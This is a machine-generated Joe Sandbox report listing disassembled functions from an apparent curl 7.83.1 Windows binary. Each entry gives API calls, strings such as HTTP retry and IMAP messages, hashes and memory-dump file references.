String ID: SENT$Sending data failed (%d)
API String ID: 1802528911-3459338696
Opcode ID: fd558f6887ee6aca07271cb4ab4f1204099f33023522502dbda1021ed0f9aef3
Instruction ID: cbe6385fcba2dd64315ab448b344d19d23d9ad7889f2efc80f3cb914476c276a
Opcode Fuzzy Hash: fd558f6887ee6aca07271cb4ab4f1204099f33023522502dbda1021ed0f9aef3
Instruction Fuzzy Hash: DDF02431204348BFD705A799EC0AEEF3BADDB49770F1080A8F505973D2EA619E0083A0

Function 000E2EBE Relevance: 6.5, APIs: 5, Instructions: 263COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2EDF
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2F0B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E2F22

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: calloc$free
String ID:
API String ID: 171065143-0
Opcode ID: 15b4c94cc28bb0ca4582c3df7cf14447276d99fb58cac246d538c17a96c4593b
Instruction ID: 511ef9b418869886f2e4b7591aa3eb1a827c9cd9c8299eefa5aecc810b9f3e41
Opcode Fuzzy Hash: 15b4c94cc28bb0ca4582c3df7cf14447276d99fb58cac246d538c17a96c4593b
Instruction Fuzzy Hash: 1AB18875508681CECB16CF2988887D67FE1AF59310F2880FADC499F347D7729946CBA0

Function 0010014E Relevance: 6.3, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000017,00000017,?,000EEB2F,?,?,?,?,?), ref: 0010016B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,000DE01D,00000000,00000000,?), ref: 001001A4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000DE01D), ref: 001001CA
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000DE01D), ref: 00100222
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,000DE01D,00000000,00000000,?), ref: 00100234

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$malloc
String ID:
API String ID: 2190258309-0
Opcode ID: 9a57ff1909bbe4d4ffe79627d7f3cceea09336caac7cbdb32120bf18d07bd592
Instruction ID: a7cd604643ff3f9502741b65490f5dbf74251acab21a5319fd4025421e319f40
Opcode Fuzzy Hash: 9a57ff1909bbe4d4ffe79627d7f3cceea09336caac7cbdb32120bf18d07bd592
Instruction Fuzzy Hash: 1E31E335610214DFCB099F18EC4869D7BF6FF88320F14C06AE805DB390DBB09C418BA5

Function 000E1150 Relevance: 6.3, APIs: 5, Instructions: 92COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E11DA

Part of subcall function 000D0D8D: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D0DA4

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E11F3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1208
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1231
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1246

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$malloc
String ID:
API String ID: 2190258309-0
Opcode ID: f116c33146e0daff08ca5f0ca614606c9c01946a66d229c812df17389d0c719c
Instruction ID: c86b77ecd93d23317a65a345e47a0a66b767d8acd4218dbb808b7775cf5a43cc
Opcode Fuzzy Hash: f116c33146e0daff08ca5f0ca614606c9c01946a66d229c812df17389d0c719c
Instruction Fuzzy Hash: AC31D432B00655DFCB648F1ADC446AD73E6EF84320F14807EDA05F7251CB70AC528BA6

Function 0010AB9A Relevance: 6.3, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010ABCC
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010ABFD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010AC1F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010AC36
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010AC50

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d69807cf72c66008aea449b9fac545bb1cc6fb3fb20a4610c0f0395398a9d7fd
Instruction ID: 2d08edd8c0b6faf9c64c7aa67ad7ae94870ba32855edc3fce02ebe921d2c957f
Opcode Fuzzy Hash: d69807cf72c66008aea449b9fac545bb1cc6fb3fb20a4610c0f0395398a9d7fd
Instruction Fuzzy Hash: B421F575A14926EFCB089F65EE44458BBB2FF48361310813BE81593A61CB74AC61CFD5

Function 000FDCE3 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FDD98

Strings

%s%s, xrefs: 000FDD6F
Wildcard - "%s" skipped by user, xrefs: 000FDE07
Wildcard - START of "%s", xrefs: 000FDDAA

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: %s%s$Wildcard - "%s" skipped by user$Wildcard - START of "%s"
API String ID: 1294909896-4272885751
Opcode ID: c27bbf587c0c8fff556ac8bef51b5f8d9b67aaad6bb8a0624818814864b2dd36
Instruction ID: 592fd3e9f8a4f1a04273a4701a523099eb16098f1283402bb40d4f07283bae2e
Opcode Fuzzy Hash: c27bbf587c0c8fff556ac8bef51b5f8d9b67aaad6bb8a0624818814864b2dd36
Instruction Fuzzy Hash: EC617E71B00606EFCB68DF64C880AB9F7E2BF94304F14416BDA1A9B751DB31B854EB91

Function 000F73CA Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F741B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F759B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F75B6

Strings

Failed to alloc scratch buffer, xrefs: 000F7427

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$malloc
String ID: Failed to alloc scratch buffer
API String ID: 2190258309-2192203314
Opcode ID: 27c43769652d1062edc3321c5299b3e06b3fb67a92f3c66107d04bfe6c601dee
Instruction ID: 6a4ef1f99d55c44e20f7be7924e333ea1ac7efcd6df3308e5de052a4720d47cb
Opcode Fuzzy Hash: 27c43769652d1062edc3321c5299b3e06b3fb67a92f3c66107d04bfe6c601dee
Instruction Fuzzy Hash: 64619171E0460A9FCB18CFA8D984ABEBBF5FF48310F1481AAD509E7341D770AA51DB91

Function 000F6E00 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F6E3D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F6F1D

Strings

., xrefs: 000F6EB0

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: .
API String ID: 1294909896-916926321
Opcode ID: f17fd2aaee2fac275f76fb12565d19e44fa58c266dba9ae5dc6aaadda9033f4c
Instruction ID: 66a19f9cb572e6c7e4333613aaf627b6f61175d954efd986d1086a8f394b0bcf
Opcode Fuzzy Hash: f17fd2aaee2fac275f76fb12565d19e44fa58c266dba9ae5dc6aaadda9033f4c
Instruction Fuzzy Hash: CD51B07160821ADFCB24CF24E84476AFBE5FF84760F14857AF9488B641DB71A848DBD2

Function 000EC6A7 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EC7FA

Strings

REFUSED_STREAM, retrying a fresh connect, xrefs: 000EC72F
Connection died, retrying a fresh connect (retry count: %d), xrefs: 000EC777
Connection died, tried %d times before giving up, xrefs: 000EC759

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: Connection died, retrying a fresh connect (retry count: %d)$Connection died, tried %d times before giving up$REFUSED_STREAM, retrying a fresh connect
API String ID: 1294909896-4242497519
Opcode ID: dc7f47aa94a1590cb385e0daa8c29fe3f94d133539c3fdf5978ab0c905d4ff8c
Instruction ID: 1ffabfd854a54c14d0a361f1e9db4fa70a1afe6bde23890e617d878f1bae3c42
Opcode Fuzzy Hash: dc7f47aa94a1590cb385e0daa8c29fe3f94d133539c3fdf5978ab0c905d4ff8c
Instruction Fuzzy Hash: E3412A30708681AFFB19CB35D949FA4B7E1BF85314F1C0169E84C5B282DB72AC55CBA1

Function 00101B30 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 000C3857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 000C3872

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00101B96

Strings

OK [UIDVALIDITY %19[0123456789]], xrefs: 00101B68
Select failed, xrefs: 00101C32
Mailbox UIDVALIDITY has changed, xrefs: 00101BDE

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __stdio_common_vsscanffree
String ID: Mailbox UIDVALIDITY has changed$OK [UIDVALIDITY %19[0123456789]]$Select failed
API String ID: 2458389622-3309259123
Opcode ID: d82bc3bbda53c65bee2e1556a6e72995097185288ec42cfae831cb12fdd0de29
Instruction ID: 2e70b217db832252955cd5bd7ac954a76fb5b987dc2c743dbf0d440e0cd8b706
Opcode Fuzzy Hash: d82bc3bbda53c65bee2e1556a6e72995097185288ec42cfae831cb12fdd0de29
Instruction Fuzzy Hash: 2B312770B44204EBDF18AF55E9429AD77FAFF88310F14403FE845A7282DBB8AC418B94

Function 000F044E Relevance: 6.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000F0489
___from_strstr_to_strchr.LIBCMT ref: 000F0499
___from_strstr_to_strchr.LIBCMT ref: 000F04A8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000EA507), ref: 000F04DD

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchr$malloc
String ID:
API String ID: 383369926-0
Opcode ID: 83715063a901b46e2114ae59cc9c6c21e624b825c9df66b2446bc9e674c75986
Instruction ID: 8cd4a1643faf22ba0bf05e99aca179f7558e3307f0b4a3ee828e960937715831
Opcode Fuzzy Hash: 83715063a901b46e2114ae59cc9c6c21e624b825c9df66b2446bc9e674c75986
Instruction Fuzzy Hash: 8A1192E610935729EB651A34BC507F767C9DFD33D8F24002DE78187A83DE12AC066270

Function 000CD323 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100), ref: 000CD370
___from_strstr_to_strchr.LIBCMT ref: 000CD386
___from_strstr_to_strchr.LIBCMT ref: 000CD39C
fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100), ref: 000CD3DF

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchrfgets
String ID:
API String ID: 4248516992-0
Opcode ID: 690b7c3ec67bc203d1072e322cf88d9ec75baca3b141d91e67ff7b85fe58cb37
Instruction ID: 2faf434558913edc06e67af574c9951e0b557484c4cad1415f48f0c6c2b71f75
Opcode Fuzzy Hash: 690b7c3ec67bc203d1072e322cf88d9ec75baca3b141d91e67ff7b85fe58cb37
Instruction Fuzzy Hash: CB21E2759042199ADB28CF649C41BDAB3A8AF15340F0040FED585DB141EAB09FC48A60

Function 000C65D4 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C661C
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C6636
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C6651
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C666B

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _strdupfree
String ID:
API String ID: 1865132094-0
Opcode ID: 39b45ee79df41ed916b593632b942461d266b92d7183948199c5f1ac96e04990
Instruction ID: 395db8ffa2eca37f09c537053d17d8cf9a8c473a673d6263116db3d2821f3909
Opcode Fuzzy Hash: 39b45ee79df41ed916b593632b942461d266b92d7183948199c5f1ac96e04990
Instruction Fuzzy Hash: F6217E755087829EC7708F388488FEEBBE46B57314F1D8E1EE89697680CB32D942CB45

Function 000D0EDA Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I32,00000003,?,000D0FFB,?,00000000,74F743D0,?,000D1589,?,?,?,?,00000000), ref: 000D0EE5
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I64,00000003,?,?,?,?,?,?,?,?,?,00000000), ref: 000D0EFA

Strings

I32, xrefs: 000D0EDF
I64, xrefs: 000D0EF4

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: strncmp
String ID: I32$I64
API String ID: 1114863663-3980630743
Opcode ID: bd4b7a1c98cec94d211be1db03358243505b8cc1d1ca9b3268e9b4eaec26b4e1
Instruction ID: 6d2a0994425d35f7d3576e317ec2c32b996734c6da7003f824864803704f6d18
Opcode Fuzzy Hash: bd4b7a1c98cec94d211be1db03358243505b8cc1d1ca9b3268e9b4eaec26b4e1
Instruction Fuzzy Hash: A511B33A94475394DAF98B3C6AED7AB1AC6A702750F3806BBDD0CC5F69D141CE858073

Function 000F480B Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,000D24A8), ref: 000F4820
__alldvrm.LIBCMT ref: 000F4839
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F4863
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,000D24A8,00000000), ref: 000F4873

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
String ID:
API String ID: 1296068966-0
Opcode ID: 99f8a759a9d9103863fb5373a950281168381aa3dc2b63a848dbc873366a0bda
Instruction ID: 0ea94f6e188f2c96a097fdefcfd4b46acb3d2b0b421dbdef8feffdba014c86df
Opcode Fuzzy Hash: 99f8a759a9d9103863fb5373a950281168381aa3dc2b63a848dbc873366a0bda
Instruction Fuzzy Hash: 7201C471A04204BFD715DFA4DC81B9E7BFAEB4C304F108079B508D7961D7329992D740

Function 000D027A Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,000C10B6), ref: 000D028E
__alldvrm.LIBCMT ref: 000D02A7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D02D1
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,000C10B6), ref: 000D02DA

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: CountCounterPerformanceQueryTickUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
String ID:
API String ID: 1296068966-0
Opcode ID: 5d6f4226dd8bde1489c2d6bee2f182ebcc93728ca18a9b1d069537386006b257
Instruction ID: 29e10b1b858c21d009c8187c1f72ccc13fcd7b6176325bf9e44c4dc75ba7c32c
Opcode Fuzzy Hash: 5d6f4226dd8bde1489c2d6bee2f182ebcc93728ca18a9b1d069537386006b257
Instruction Fuzzy Hash: 97F02872A05204BFD71997A4EC45FDA7ABEEB4C300F208239B208A79A1C7B24ED15760

Function 000E887E Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,000C8BF9,000E8B58,?,000E1E86,?,?,00000000), ref: 000E8889
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E1E86,?,?,00000000), ref: 000E889F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E1E86,?,?,00000000), ref: 000E88B3
closesocket.WS2_32(000000FF), ref: 000E88CB

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$CriticalDeleteSectionclosesocket
String ID:
API String ID: 3086658127-0
Opcode ID: 8888bd14a6aa56e0de73cc326bcd9faedb522b8f7946bb5961a2f5e84733b4f8
Instruction ID: 5158da9092a83f19de714e22f0843e79a75142d0bf722dfa28ac7973f14f735a
Opcode Fuzzy Hash: 8888bd14a6aa56e0de73cc326bcd9faedb522b8f7946bb5961a2f5e84733b4f8
Instruction Fuzzy Hash: D3F04F35200912EFCB192B11EC0865CB762FF84721B14C13AF915539F0DF7018A2CB91

Function 000E603F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000E6067

Part of subcall function 000EE9BE: inet_pton.WS2_32(00000002,?,?), ref: 000EE9D8
Part of subcall function 000EE9BE: inet_pton.WS2_32(00000017,?,?), ref: 000EE9E9

Strings

max-age=, xrefs: 000E609F
includesubdomains, xrefs: 000E6123

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: inet_pton$_time64
String ID: includesubdomains$max-age=
API String ID: 868955570-1235841791
Opcode ID: 117f4d7df1f33787a8ad102fb1755db9f7596e1d2fea590c7720639380d31d00
Instruction ID: fbb9d723a99acca4f4b463331d830607960364be881cc63462dc6034247a33d2
Opcode Fuzzy Hash: 117f4d7df1f33787a8ad102fb1755db9f7596e1d2fea590c7720639380d31d00
Instruction Fuzzy Hash: F2512A31F442E54FDB259A7AA8213FEB7E55F76390F2C509AD8D1B7383DA628C048790

Function 000CFF30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000D00A4

Part of subcall function 000D20F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,000C8A7A,curl 7.83.1 (Windows) %s,00000000), ref: 000D2101

Strings

%0*lu, xrefs: 000D0014
internal error: invalid pattern type (%d), xrefs: 000D0034

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_func_strdup
String ID: %0*lu$internal error: invalid pattern type (%d)
API String ID: 2404189530-449433499
